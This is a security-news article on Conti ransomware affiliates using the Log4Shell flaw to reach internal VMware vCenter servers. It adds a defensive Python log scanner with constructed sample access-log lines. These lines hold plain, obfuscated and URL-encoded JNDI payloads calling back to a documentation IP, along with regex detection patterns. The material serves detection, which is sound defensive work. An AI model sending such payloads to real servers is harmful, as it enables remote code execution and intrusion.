Conti ransomware uses Log4j bug to hack VMware vCenter servers (Security News, December 2021)

The Conti ransomware operation is using the critical Log4Shell vulnerability (CVE-2021-44228 in Apache Log4j) to gain rapid access to internal VMware vCenter Server instances and encrypt the virtual machines they manage.
Among the first to exploit the bug were cryptocurrency-mining malware, botnets, and a new ransomware strain called Khonsari.
While most defenders are focused on blocking Log4Shell attacks against Internet-exposed devices, the Conti operation shows how the vulnerability can be used against internal systems that may receive far less attention.
Researchers confirmed that Conti affiliates had already gained a foothold in the target networks and then exploited vulnerable Log4j instances to reach the vCenter servers.
Conti is a Russian-speaking group with a long history in ransomware and is regarded as the successor of the infamous Ryuk.
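The practical lesson above is that a Log4Shell payload works wherever attacker-controlled text ends up in a Log4j log, so internal access logs deserve the same scrutiny as perimeter ones. The following is an added example, not code from the article or from VMware: a small Python scanner that URL-decodes each log line, peels the nested-lookup obfuscation seen in the wild (`${lower:j}`, `${::-n}`, `${env:X:-d}`), and reports the JNDI scheme and callback host for each hit. The log lines, IP addresses and request paths are constructed for the example and do not describe any specific vCenter endpoint.

```python
import re
from urllib.parse import unquote

# Innermost lookups used to hide the literal "jndi":
#   ${anything:-value}  -> value   (covers ${::-j} and ${env:NOPE:-j})
#   ${lower:X} / ${upper:X} -> x / X
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)

# A JNDI lookup once obfuscation is removed; captures scheme and callback host.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:/*([^/:}\s]+)",
    re.I,
)


def normalize(line: str) -> str:
    """Undo URL-encoding and simple nested-lookup obfuscation, innermost first."""
    s = line
    for _ in range(5):  # bounded: a few rounds cover double/triple encoding
        s = unquote(s)
    for _ in range(20):  # peel nested lookups from the inside out until stable
        new = _DEFAULT.sub(lambda m: m.group(1), s)
        new = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            new,
        )
        if new == s:
            break
        s = new
    return s


def find_log4shell(lines):
    """Return (line_no, scheme, host) for every line carrying a JNDI lookup."""
    hits = []
    for n, raw in enumerate(lines, 1):
        m = _JNDI.search(normalize(raw))
        if m:
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits


# Constructed sample access-log lines (not real traffic); the payload sits in the
# User-Agent field on lines 2 and 3 and in the URL-encoded query string on line 4.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:03:14:09 +0000] "GET /ui/login HTTP/1.1" 200 88 "-" '
    '"${jndi:ldap://203.0.113.7:1389/o}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:11 +0000] "GET /websso/login HTTP/1.1" 200 88 "-" '
    '"${${lower:j}${upper:n}${::-d}i:${env:NOPE:-l}dap://203.0.113.7:1389/x}"',
    '10.0.0.9 - - [11/Dec/2021:03:14:12 +0000] '
    '"GET /ui/?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.3 - - [11/Dec/2021:03:14:20 +0000] "POST /sdk HTTP/1.1" 200 0 "-" "VMware vim-java"',
]

if __name__ == "__main__":
    for line_no, scheme, host in find_log4shell(SAMPLE_LOG):
        print(f"line {line_no}: jndi {scheme} lookup to {host}")
```

Run it over the access and application logs of internal hosts, not only the edge, and feed the reported callback hosts into egress blocking; outbound LDAP or RMI from an application server to an unknown host is itself a strong signal. The normalizer only handles the common obfuscations, so treat a clean result as triage, not as proof of absence.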
Recently, the Australian Cyber Security Centre published an alert about Conti ransomware targeting multiple organizations in the country.
Related news
- Over 37,000 VMware ESXi servers vulnerable to ongoing attacks
- Like whitebox servers, rent-a-crew crime 'affiliates' have commoditized ransomware
- ⚡ THN Weekly Recap: Router Hacks, PyPI Attacks, New Ransomware Decryptor, and More
- Veeam RCE bug lets domain users hack backup servers, patch now
- RedCurl cyberspies create ransomware to encrypt Hyper-V servers